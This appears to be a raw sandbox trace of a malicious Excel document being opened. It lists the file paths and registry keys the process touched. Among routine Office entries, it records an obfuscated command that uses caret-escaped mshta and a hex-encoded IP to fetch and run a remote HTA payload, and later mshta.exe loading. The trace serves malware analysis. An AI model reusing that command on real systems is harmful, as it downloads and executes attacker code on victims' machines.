C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170134v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170135v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170136v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170137v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170138v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170139v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170140v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170141v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170142v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180178v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170021v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120307v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63071v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63028v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63030v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63041v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63049v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63058v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63059v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63078v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65136v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65138v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65139v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63038v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63040v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63042v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63052v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63053v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65137v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222015v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222042v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222043v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222049v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222100v7.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222101v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222102v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222200v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226000v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70002v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70003v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70006v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70025v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70027v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270005v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270006v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270007v0.xml
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\MSORES.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\MSORES.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\dcomp.dll
C:\Windows\SysWOW64\dcomp.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\ink\InkObj.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkObj.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\System\C_1251.NLS
C:\Windows\sysnative\C_1251.NLS
C:\Users\user\AppData\Roaming\Microsoft\Office\
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Microsoft Office\root\Office16\CHART.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\xlsrvintl.dll
C:\Users\user\Documents\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Program Files (x86)\Microsoft Office\root\Office16\cmd.exe
C:\Users\user\Documents\cmd.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\user\Videos\desktop.ini
C:\Users\user\Documents\cmd
C:\Users\user\Documents\cmd \c
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents\cmd \c.exe
C:\Users\user\Documents\cmd \c m^sh^t^a
C:\Users\user\Documents\cmd \c m^sh^t^a.exe
C:\Users\user\Documents\cmd \c m^sh^t^a h^tt^p^:\^\0xb907d607\fer\fer.html
C:\Users\user\Searches\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Office\
C:\Users\user\AppData\Local\Microsoft\Office\Excel.officeUI
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\**
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\*
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYM.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMB.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMB.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMK.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMK.TTF
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\SystemResources\usp10.dll.mun
C:\Windows\SystemResources\usp10.dll.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\globinputhost.dll
C:\Windows\SysWOW64\globinputhost.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\Bcp47Langs.dll
C:\Windows\SysWOW64\Bcp47Langs.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMXB.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMXB.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\osfshared.dll
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\PowerPoint
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\PowerPoint\1380790193167760279.C4
C:\Users\user\AppData\Local\Temp\cua70s1qt54g1.removed
C:\Users\user\AppData\Local\Temp\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef\prewarm.dat
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef\prewarmtoken.dat
C:\Users\user\AppData\Local\Temp\208ck6h5lbmm3.removed
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\windows.storage.dll.mui
C:\Windows\SysWOW64\en-US\windows.storage.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\windows.storage.dll.mui
C:\Windows\sysnative\en-US\windows.storage.dll.mui
C:\Users\user\AppData\Local\Temp\6s00q1j3qno5.removed
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
C:\Users\user\Documents
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\*
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\SHELL32.dll.mui
C:\Windows\SysWOW64\en-US\SHELL32.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\SHELL32.dll.mui
C:\Windows\sysnative\en-US\SHELL32.dll.mui
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\PowerPoint
C:\Users\Public\Documents\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\PowerPoint\1380790193167760279.C4
C:\Users\user\Downloads
C:\ProgramData
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Office.PolicyTips.dll
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\CoreMessaging.dll
C:\Windows\SysWOW64\CoreMessaging.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\CoreUIComponents.dll
C:\Windows\SysWOW64\CoreUIComponents.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
\Device\HarddiskVolume2\\h9ei_yS.xls
C:\h9ei_yS.xls
C:\Program Files
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\desktop.ini
C:\Program Files\desktop.ini
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Q3RydV6baabTSR.csv
C:\Program Files\Q3RydV6baabTSR.csv
\Device\HarddiskVolume2\\6c6.xls
C:\6c6.xls
C:\Windows\Temp\MU0T0V0yfT.csv
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Temp\MU0T0V0yfT.csv
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\UjxheMUzQ.xls
C:\Program Files\UjxheMUzQ.xls
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\izL0hOMhMcSeOy.xls
C:\Program Files\izL0hOMhMcSeOy.xls
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Logs
C:\Windows\Logs
C:\Windows\Logs\d_3__0jf_xbV.xlsx
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Logs\d_3__0jf_xbV.xlsx
\Device\HarddiskVolume2\\dj39LMVNywjak.xls
C:\dj39LMVNywjak.xls
\Device\HarddiskVolume2\\Rw3wae.csv
C:\Rw3wae.csv
\Device\HarddiskVolume2\\eRMVUgygiw.xls
C:\eRMVUgygiw.xls
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\awLb6.xlsx
C:\Program Files\awLb6.xlsx
\Device\HarddiskVolume2\\ONecNeew0.xlsx
C:\ONecNeew0.xlsx
C:\Windows\Logs\6gSVzNackc0U.csv
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Logs\6gSVzNackc0U.csv
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\heUxkage.xlsx
C:\Program Files\heUxkage.xlsx
C:\Windows\Temp\9LT30xMbyUT.xlsx
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Temp\9LT30xMbyUT.xlsx
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\f36ygxU_6RwkNP.xlsx
C:\Program Files\f36ygxU_6RwkNP.xlsx
C:\Windows\Temp\xfgag9.xlsx
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Temp\xfgag9.xlsx
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\sxs.dll
C:\Windows\SysWOW64\sxs.dll
C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-2527171340-3306644326-1278290521-1001.pckgdep
C:\Windows\apppatch\01DAE253CB05A661.sysmain.sdb
C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy\S-1-5-18.pckgdep
C:\Windows\System32\nduprov.dll
\??\NduIoDevice
\??\PhysicalDrive0
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuth.exe
C:\Windows\System32\%systemroot%\system32\wbem\cimwin32.dll
C:\Windows\System32\en-US\USER32.dll.mui
C:\Windows\System32\rpcss.dll
C:\Windows\System32\kernel.appcore.dll
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\System32\wmiclnt.dll
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_3107874c7db0aa5a\MPDW-manifest.ini
C:\Windows\System32\spool\V4Dirs\55157D56-711D-481B-8227-45C9571F46C2\69b8a4a.BUD
C:\Windows\System32\spool\V4Dirs\55157D56-711D-481B-8227-45C9571F46C2\69b8a4a.gpd
C:\Windows\System32\urlmon.dll
C:\Windows\System32\iertutil.dll
C:\Windows\System32\srvcli.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_3107874c7db0aa5a\MPDW_devmode_map.xml
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_3107874c7db0aa5a\
C:\Windows\System32\en-US\combase.dll.mui
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_3107874c7db0aa5a\MPDW-constraints.js
C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_f4a269683ef774ae\Amd64\PrintConfig.dll
C:\Windows\System32\sxs.dll
C:\Windows\System32\stdole2.tlb
C:\Windows\System32\msxml6.dll\1
C:\Windows\System32\msxml6.dll
C:\Windows\System32\spool\V4Dirs\55157D56-711D-481B-8227-45C9571F46C2\pdc.xml
C:\Windows\System32\en-US\localspl.dll.mui
C:\Windows\System32\en-US\prntvpt.dll.mui
C:\Users\user\Documents\mshta.*
C:\Python38\Scripts\mshta.*
C:\Python38\mshta.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\mshta.*
C:\ProgramData\Boxstarter\mshta.*
C:\Windows\System32\mshta.*
C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\CRYPTSP.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\System32\windows.storage.dll
C:\Windows\System32\WinTypes.dll
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.aodl
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth*.aodl
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth*.odl
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth*.odlsent
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth*.odlgz
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\telemetry-dll-ramp-value.txt
C:\Program Files (x86)
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\DeviceHealth.json
C:\Users\user\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.odl
C:\Windows\SysWOW64\msIso.dll
C:\Windows\SysWOW64\profapi.dll
C:\Windows\System32\IPHLPAPI.DLL
\??\Nsi
C:\Windows\System32\winnsi.dll
C:\Windows\System32\textinputframework.dll
C:\Windows\System32\en-US\mshtml.dll.mui
C:\Windows\sysnative\en-US\mshtml.dll.mui
C:\Windows\System32\twinapi.appcore.dll
C:\Windows\SysWOW64\dxgi.dll
C:\Windows\SysWOW64\mshta.exe
C:\Windows\System32\resourcepolicyclient.dll
C:\Windows\System32\directxdatabasehelper.dll
C:\Windows\System32\mswsock.dll
C:\Windows\System32\en-US\mswsock.dll.mui
C:\Windows\sysnative\en-US\mswsock.dll.mui
C:\Windows\System32\wshqos.dll
C:\Windows\System32\en-US\wshqos.dll.mui
C:\Windows\sysnative\en-US\wshqos.dll.mui
C:\Windows\SysWOW64\msls31.dll
C:\Windows\SysWOW64\d2d1.dll
C:\Windows\SysWOW64\DWrite.dll
C:\Windows\SysWOW64\d3d11.dll
C:\Windows\System32\d3d10warp.dll
C:\Windows\Fonts\times.ttf
C:\Windows\Fonts\seguisym.ttf

C:\Users\user\AppData\Local\Temp\{190C62E0-8338-4298-B5AA-DA9CDB831115} - OProcSessId.dat
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
\Device\RasAcd
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData2.xml
C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls
C:\Users\user\AppData\Local\Temp\~DFFEED631473581C47.TMP
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\PowerPoint\1380790193167760279.C4
C:\Users\user\AppData\Local\Temp\cua70s1qt54g1.removed
C:\Users\user\AppData\Local\Temp\208ck6h5lbmm3.removed
C:\Users\user\AppData\Local\Temp\6s00q1j3qno5.removed
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\PowerPoint\1380790193167760279.C4
\??\NduIoDevice
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.aodl
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.odl

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e1d3d0538af180de70c8259a1c129c676ec8cbe4.tbres
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\PowerPoint
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.aodl

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\000604xx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Sorting\Ids
HKEY_LOCAL_MACHINE\Software\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\ClickToRun\OverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PackageLockerPath
HKEY_LOCAL_MACHINE\Software\Microsoft\SoftGrid\4.5\Client\AppFS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files (x86)\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\Disabled
HKEY_LOCAL_MACHINE\
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\VirtualRegistry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\SELECT
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\ComExclusions
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\Virtualized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelaySleepLoopWindowSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelaySpinCountThreshold
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelayBaseYield
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtFactorYield
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelayMaxYield
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\DllPrevention
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\STE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\MDMEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office Test\Special\Perf
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AppRecoveryPingInterval
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud
HKEY_CURRENT_USER\Software\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\cloud\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\Sampling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\CountryCode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo\SDXIdAndVersion
